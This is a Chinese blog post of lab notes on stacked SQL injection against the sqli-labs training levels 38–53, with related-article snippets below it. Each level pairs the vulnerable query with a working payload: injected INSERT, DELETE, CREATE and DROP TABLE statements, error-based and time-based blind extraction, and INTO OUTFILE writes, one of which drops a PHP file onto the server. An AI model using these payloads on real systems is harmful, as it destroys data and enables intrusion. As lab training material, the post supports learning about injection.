SQL注入之堆叠注入

最新推荐文章于 2024-05-12 03:58:44 发布
最新推荐文章于 2024-05-12 03:58:44 发布
阅读量2.9k 收藏 5
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77150515
版权

less-38

源码:$sql="select * from users where id='$id' limit 0,1";

注入:?id=1';insert into users (id,username,password) values(12,'jack','jacl')--+

less-39

源码:$sql="select * from users where id=$id limit 0,1";

注入:?id=1;insert into users (id,username,password) values(12,'jack','jacl')--+

less-40

源码:$sql="select * from users where id=('$id') limit 0,1";

注入:?id=1');insert into users (id,username,password) values(12,'jack','jacl')--+

less-41:

和less-40一样,盲注

注入:?id=1;insert into users (id,username,password) values(13,'jack','jack')%23

less-42:

源码login.php:

$username=mysqli_real_escape_string($conl, $_POST['login_user']);

$password=$_POST["login_password"];  //password没有被过滤

$sql="select * from users where username='$username' and password='$password'";

注入:a';create table class like users#

less-43:

源码login.php:

漏洞同上,区别在于:$sql="select * from users where username=('$username') and password=('$password')";

注入:a');drop table class#

less-44:

没有任何报错信息,采用盲注

漏洞同less-42

注入:a';insert into class (id,username,password) values('11','jack','jack')#

less-45:

没有任何报错信息,采用盲注

漏洞同less-43

注入:a');delete from class where id=11#

less-46:

源码:$sql="select * from users order by $id";

尝试?sort=1 desc和?sort=1 asc, 显示结果不同,则表明可以注入,?sort=rand(ture)和?sort=rand(false)的结果也不一样

1.报错注入:?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()), 0x3a,0x3a,floor(rand()*2)) limit 0,1)

2.延时注入:?sort=1 and if(ascii(substr(database(),1,1))=118,0,sleep(5))

3.添加注入语句

procedure analyse参数注入:?sort=1 procedure analyse(extractvalue(rand()*2, concat(0x3a,version())),1)

into outfile参数注入:?sort=1 into outfile "c:/data.txt"

less-47:

源码:$sql="select * from users order by '$id'";  //将数字型变成了字符型

1.and rand相结合

2.导入导出文件into outfile参数

?sort=1' into outfile "c:/data.txt"--+

利用lines terminated by上传木马

?sort=1' into outfile "c:/..../data.php" lines terminated by Ox3c3f604947501d3979--+(木马<? php phpinfo();?>进行16进制转换)

less-48:

与less-46的区别在于没有报错信息,盲注

?sort=(if(ascii(substr(database(),1,1))=116,0,sleep(5)))

less-49:

与less-47的区别在于没有报错信息,盲注

?sort=1' and (if(ascii(substr(select username from users limit 0,1),1,1))=69,0,sleep(1)))--+

less-50

源码:$sql="select * from users order by $id";

if (mysqli_multi_query($con1,$sql))  //mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句

注入:?sort=1;create table jack like users#

less-51

源码:$sql="select * from users order by '$id'";

注入:?sort=1';drop table jack--+

less-52

同less-50,不过没有报错信息

注入:?sort=1;insert into users (id,username,password) values('16','jack','jack')--+

less-53

同less-51,不过没有报错信息,盲注

注入:?sort=1';delete from jack where id=16;--+


玄瞋
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入
午夜安全
10-03 6598
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入 堆叠查询注入堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。1)考虑使用堆叠注入访问URL:http://www.tianchi.com/web/duidie.php?id=1返回正常信息;访问URL:http://www.tianchi.com/web/duidie.php?id=1'返回错误信息......
sql注入知识---堆叠注入
尘玥的故事
04-11 1209
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
sql注入堆叠注入
m0_68976043的博客
02-23 1981
堆叠注入产生原因是因为mysql_multi_query()支持多行查询,如果没有这个函数我们使用不了堆叠注入,其次堆叠注入通过分号分隔。
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(1),该如何高效实用Kotlin
最新发布
2401_84302761的博客
05-12 663
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sql注入-堆叠注入】多语句执行、结合其他注入
07-12 4583
堆叠注入】相比其他注入能执行的操作更多
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3177
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
SQL注入漏洞-07】堆叠查询靶场实战
cc
02-05 5970
堆叠查询的局限性: 堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种注入方式并不是十分的完美的。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。如上面的实例如果我们不输出密码那我们是看不到这个结果的。因此,在读取数据时,我们建议使用union(联合)
SQL注入注入
studyphp123的博客
04-22 561
一、预备知识 二、实验目的 三、实验工具 浏览器 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-5/?id=1 #页面正常 第二步:加入单引号,访问 http://www.any.com/sqli/Less-5/?id=1' #会报错 第三步:判断列数。(通过二分法) 1)输入: http://www.any.com/s...
第18天:WEB漏洞-SQL注入堆叠及WAF绕过注入1
08-03
堆叠注入(Stacked Injections)是 SQL 注入的一种特殊形式,即在一个 SQL 语句中执行多个语句。 在 MySQL 中,每个语句结尾加;表示语句结束。因此,我们可以将多个语句结合起来,形成一个堆叠注入。例如: id=-1...
sql注入靶场.zip
06-24
它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入堆叠查询注入等。每个挑战都设计有特定的注入点,需要利用这些点来获取敏感信息,例如数据库中的用户名、密码或其他...
sqlmap sql 注入测试工具
03-06
- 技术细节:SQLMap会尝试各种注入技术,包括但不限于ORDER BY注入、UNION SELECT注入堆叠查询注入等,以找到最有效的注入点。 4. 安全测试流程: - 预备阶段:了解目标网站的结构,确定可能的注入点。 - 扫描...
SQL注入天书 sqli-labs
01-11
5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名、列名等敏感信息,为后续攻击铺平道路。 7. **OS命令注入**:在某些情况下,SQL...
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1433
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
SQL注入实战总结
qq_44657899的博客
06-16 1393
文章目录0x01 联合注入:union0x02 boolean注入 盲注 0x01 联合注入:union database()库名 user()用户 version()版本号 load_file('/etc/passwd') group_concat(password) 0x02 boolean注入 盲注 基本思路 and 1=1 返回1 yes and 1=2 返回0 no 判断数据库长度 ' and lenth(database())>=4 --+ 判断数据库名字 ' and substr(d
SQL注入-堆叠注入
m0_53820621的博客
08-15 1385
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
15-SQL堆叠注入
qq_56414082的博客
03-29 1642
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
sql-堆叠注入
zhhhb1005的博客
08-14 507
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
说明管道符注入堆叠注入
04-03
管道符注入:管道符(|)是Linux系统中的一个特殊字符,用于将一个命令的输出传递给另一个...例如,攻击者可以在Web应用程序中的登录表单中注入堆叠注入代码,然后执行多个SQL语句,以获取敏感数据或完全控制应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值